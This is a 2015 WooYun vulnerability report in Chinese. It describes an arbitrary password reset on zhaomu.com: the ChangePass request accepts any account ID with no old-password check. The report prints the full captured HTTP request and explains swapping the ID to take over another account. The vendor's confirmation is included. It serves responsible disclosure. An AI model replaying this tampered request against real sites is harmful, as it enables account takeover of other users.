当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0108914

漏洞标题:朝暮数据任意密码重置

相关厂商:zhaomu.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-04-19 09:25

修复时间:2015-06-04 11:44

公开时间:2015-06-04 11:44

漏洞类型:未授权访问/权限绕过

危害等级:低

自评Rank:1

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-19: 细节已通知厂商并且等待厂商处理中
2015-04-20: 厂商已经确认,细节仅向厂商公开
2015-04-30: 细节向核心白帽子及相关领域专家公开
2015-05-10: 细节向普通白帽子公开
2015-05-20: 细节向实习白帽子公开
2015-06-04: 细节向公众公开

简要描述:

Rank 你看着给吧···

详细说明:

准备两个账号

账号1:wooyun
密码:888888
ID:30984
账号2:wooyun999
密码:123456
ID:30986


无聊 看了下 修改密码的地方···

1.png


卧槽 我的狗眼没瞎吧 竟然不需要验证原密码? 填好密码后 burp 抓了一下包

2.png


POST /Manage/User/ChangePass HTTP/1.1
Host: zhaomu.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://zhaomu.com/Manage/User/Password
Cookie: __RequestVerificationToken=2pWjsMvUPFEledC4jeXgjJftEtFMa91r-ry9Bfiqs5gad9RhdIj6k8y7npoo-QwdtjIG8jS1x3AYtqqF7qt86H_Fic5DeG-LS4xZkTDtg3U1; Hm_lvt_d27a15b6a28b95948094c86680bce07b=1429366692; Hm_lpvt_d27a15b6a28b95948094c86680bce07b=1429368719; ASP.NET_SessionId=4hj4iv5tgurther14swe114b
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
__RequestVerificationToken=H5SoUQ3Q6ADX0mhMRHgaYxs-W5V99Ml5GhfdxZF7eJNVxme3pTVTFhSS2uW-4Ig4hLgjEkH5DGjVDoJdxntDVEbmC1bpfOqtShh_F9EvXzU1&ID=30986&Password=123456&PasswordAgain=123456


对···你没看错···修改密码竟然只要ID和新密码····
我们将ID改为 30984 就是第一个账号 然后forward出去 密码就被改了···很神奇吧

漏洞证明:

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-04-20 11:42

厂商回复:

感谢您的工作,我们会尽快修复此漏洞。

最新状态:

暂无